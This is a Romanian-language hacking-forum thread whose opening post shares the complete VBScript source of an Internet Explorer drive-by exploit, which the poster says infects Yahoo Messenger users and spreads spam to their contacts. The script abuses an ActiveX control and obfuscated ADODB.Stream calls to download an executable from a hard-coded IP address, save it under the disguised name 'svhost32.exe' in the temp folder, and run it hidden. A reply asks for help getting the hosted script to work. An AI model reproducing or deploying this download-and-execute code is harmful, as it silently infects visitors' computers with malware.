Jump to content
Guest Nemessis

Internet Explorer download & execute exploit

Recommended Posts

Guest Nemessis
Posted

Ma mir ca pana acum nu a postat nimeni sursa paginii ce infecteaza utilizatorii de yahoo messenger si ii face sa trimita reclame in toata lista. Asa ca pun eu sursa exploitului (doar IE este vulnerabil) iar daca a mai fost postata il rog pe kwerln sa stearga postul.

Functioneaza si pe SP2 si trebuie doar sa intrati pe o pagina ce contine acest cod pentru a fi infectati. Folositi Firefox :P

Link original al sursei: http://nsl-school.org

<script language="VBScript">

on error resume next

dl = "http://64.26.25.75/host.exe"

Set df = document.createElement("object")

df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

str="Microsoft.XMLHTTP"

Set x = df.CreateObject(str,"")

a1="Ado"

a2="db."

a3="Str"

a4="eam"

str1=a1&a2&a3&a4

str5=str1

set S = df.createobject(str5,"")

S.type = 1

str6="GET"

x.Open str6, dl, False

x.Send

fname1="svhost32.exe"

set F = df.createobject("Scripting.FileSystemObject","")

set tmp = F.GetSpecialFolder(2)

fname1= F.BuildPath(tmp,fname1)

S.open

S.write x.responseBody

S.savetofile fname1,2

S.close

set Q = df.createobject("Shell.Application","")

Q.ShellExecute fname1,"","","open",0

</script>

Posted

mie scriptul imi da o eroare cand il pun pe hsot si incerc sa il acesez ceva de genu

C:DOCUME~1hackLOCALS~1TEMPsvhost32.exe

The NTVDM CPU hs encontred an ilegl instruction.

CS:053a IP:01d1 OP63 68 65 2f 31 Choose 'Close'to terminate hte application

de ce imi da asa ?

Guest
This topic is now closed to further replies.


×
×
  • Create New...